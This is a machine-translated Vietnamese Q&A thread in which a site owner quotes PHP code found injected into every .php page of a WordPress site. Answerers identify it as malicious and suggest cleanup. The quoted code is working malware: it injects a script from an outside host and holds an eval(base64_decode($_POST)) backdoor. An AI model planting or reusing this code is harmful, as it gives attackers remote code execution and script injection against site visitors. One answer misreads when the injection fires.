Tập lệnh php này sẽ làm gì? nó có phải là mã php độc hại không?

Question

Có thể ai đó Hãy tư vấn cho mã php này sẽ làm gì? tôi có php tìm thấy mã này trên mỗi trang .php chỉ, các trang khác như js/css/php.ini họ là tốt .. là mã độc này? nếu có xin vui lòng đề nghị làm thế nào để ngăn chặn chúng?

Đây là Bộ luật,

global $sessdt_o; 
if(!$sessdt_o) { 
    $sessdt_o = 1; 
    $sessdt_k = "lb11"; 
    if(!@$_COOKIE[$sessdt_k]) { 
     $sessdt_f = "102"; 
     if(!@headers_sent()) { 
      @setcookie($sessdt_k,$sessdt_f); 
     } else { 
      echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
     } 
    } else { 
     if($_COOKIE[$sessdt_k]=="102") { 
      $sessdt_f = (rand(1000,9000)+1); 
      if(!@headers_sent()) { 
       @setcookie($sessdt_k,$sessdt_f); 
      } else { 
       echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
      } 
      $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; 
      $sessdt_v = urlencode(strrev($sessdt_j)); 
      $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); 
      echo "<script src='$sessdt_u'></script>"; 
      echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; 
     } 
    } 
    $sessdt_p = "showimg"; 
    if(isset($_POST[$sessdt_p])){ 
     eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p]))); 
     exit; 
    } 
} 

Answer 1

Đó là nhiều khả năng nó sẽ chuyển hướng tất cả các trang của bạn để kẻ tấn công website. @ sẽ tạm dừng bất kỳ lỗi nào để bạn không nhận được bất kỳ nhật ký nào từ tập lệnh này.

Bạn nên xóa nó nếu bạn muốn trang web của mình hoạt động bình thường.

CHỈNH SỬA: nó không chuyển hướng nhưng nó sẽ chèn bất cứ điều gì nó muốn trên các trang của bạn. Phần thứ hai của tập lệnh mà nó kiểm tra cookie sẽ thêm một javascript từ trang web của anh ấy và có thể làm những việc độc hại.

Phần cuối cùng tôi không nghĩ rằng bất kỳ ai cũng có thể đoán được nó là gì vì nó dựa trên một số biến bài đăng và đó là $_POST['showimg'], tôi đoán anh ấy đã tấn công trang web của bạn bằng POST.

Những việc cần làm: Thay đổi mật khẩu, kiểm tra quyền ghi trên tệp của bạn, chúng không được là 0777, cơ sở dữ liệu sao lưu và Mẫu WordPress, xóa cài đặt WordPress và cài đặt lại từ đầu. Trong mẫu tìm kiếm mã của mình, sau đó thêm mẫu đã được làm sạch của bạn.

Answer 2

tôi đã không kiểm tra nó chặt chẽ, nhưng chỉ dòng

eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p]))); 

cho thấy tôi đã có nó là, nếu không độc hại, sau đó rất rất gần - có mã tiêm càng tốt.

Answer 3

Vấn đề của bạn không phải là mã, đó là cách nó đã đến đó ngay từ đầu. Bạn cần kiểm tra quyền ghi trên các tệp/thư mục của mình để đảm bảo không ai từ bên ngoài có thể sửa đổi chúng.

Bạn đã đề cập rằng bạn đang sử dụng wordpress, vui lòng đọc this article về cách bảo mật an ninh wordpress. Tôi khuyên bạn nên khóa blog của mình (nếu nó khả thi) cho đến khi bạn khắc phục sự cố bảo mật của mình.

Answer 4

im một nhà phân tích bảo mật và tôi tin rằng nó đang chuyển hướng bạn đến một trang web độc hại có thể nếu và chỉ khi bạn không có cookie đó. nếu bạn đã có cookie đó thì tập lệnh sẽ biết bạn đã ở đó và có thể nghiên cứu phần mềm độc hại do đó không thực hiện chuyển hướng. Hình ảnh có thể giống như một API cài đặt sẵn của trình gỡ lỗi phát hiện .. đây chỉ là ý kiến ​​của tôi.